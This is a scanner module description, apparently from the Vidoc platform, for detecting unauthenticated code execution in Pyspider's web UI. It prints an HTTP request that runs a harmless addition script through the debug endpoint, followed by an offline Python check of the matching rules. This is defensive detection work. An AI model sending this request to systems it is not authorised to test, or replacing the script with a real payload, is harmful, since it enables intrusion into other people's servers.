Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Pyspider Unauthorized Access" module is designed to detect unauthorized access vulnerabilities in the Pyspider web application framework. Pyspider is a powerful Python-based web crawling and scraping framework that allows users to easily develop web spiders to extract data from websites. This module focuses on identifying potential security weaknesses in the Pyspider application that could lead to unauthorized access.
This module has a severity level of high, indicating that if left unaddressed, the vulnerability it detects could have significant consequences for the security of the Pyspider application.
Author: ritikchaddha
If the "Pyspider Unauthorized Access" vulnerability is successfully exploited, an attacker could gain unauthorized access to sensitive information or perform malicious actions within the Pyspider application. This could lead to data breaches, unauthorized data modifications, or even complete system compromise.
The "Pyspider Unauthorized Access" module works by sending a specific HTTP request to the target Pyspider application and then analyzing the response to determine if the unauthorized access vulnerability is present.
One example of an HTTP request used by this module is:
POST /debug/pyspidervulntest/run HTTP/1.1
Host: {%Hostname%}
Content-Type: application/x-www-form-urlencoded

webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
This module includes the following matching conditions:
- The response body must contain the word "1020236437" (the sum of 452345672 and 567890765 printed by the test script, so it only appears if the submitted script was actually executed).
- The response status code must be 200.

If both of these conditions are met, the module identifies the presence of the "Pyspider Unauthorized Access" vulnerability.
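To make the decision logic concrete, here is an added Python example (not the module's or Vidoc's own code) that recovers the expected marker from the script in the request body and applies the two match rules to constructed sample responses entirely offline; the response shapes are assumed, not captured from a real instance.

```python
"""Offline evaluation of the module's two matching conditions (added example)."""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed form body with the same structure as the request shown above
# (task JSON shortened to "{}"; only the script field matters here).
REQUEST_BODY = (
    "webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0A"
    "class+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A"
    "++++++++print(str(452345672+%2B+567890765))&task=%7B%7D"
)


@dataclass
class HttpResponse:
    """Minimal stand-in for an HTTP response: status code and body text."""
    status: int
    body: str


def expected_marker(form_body: str) -> str:
    """Derive the value the module looks for from the script's print() call."""
    script = parse_qs(form_body)["script"][0]  # decodes '+' and %XX escapes
    m = re.search(r"print\(str\((\d+)\s*\+\s*(\d+)\)\)", script)
    if not m:
        raise ValueError("test script does not contain the expected addition")
    return str(int(m.group(1)) + int(m.group(2)))


def matches(resp: HttpResponse, marker: str) -> bool:
    """Module condition: status 200 AND marker present in the body."""
    return resp.status == 200 and marker in resp.body


def evaluate(resp: HttpResponse, form_body: str = REQUEST_BODY) -> str:
    """Classify a response the way the module would (labels are assumed)."""
    if matches(resp, expected_marker(form_body)):
        return "vulnerable: debug endpoint executed the submitted script"
    return "not matched"


if __name__ == "__main__":
    # Constructed samples: an instance that ran the script vs. a hardened one.
    print(evaluate(HttpResponse(200, '{"logs": "1020236437\\n", "result": null}')))
    print(evaluate(HttpResponse(401, "Unauthorized")))
```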
Reference - https://github.com/ianxtianxt/Pyspider-webui-poc
Metadata - max-request: 1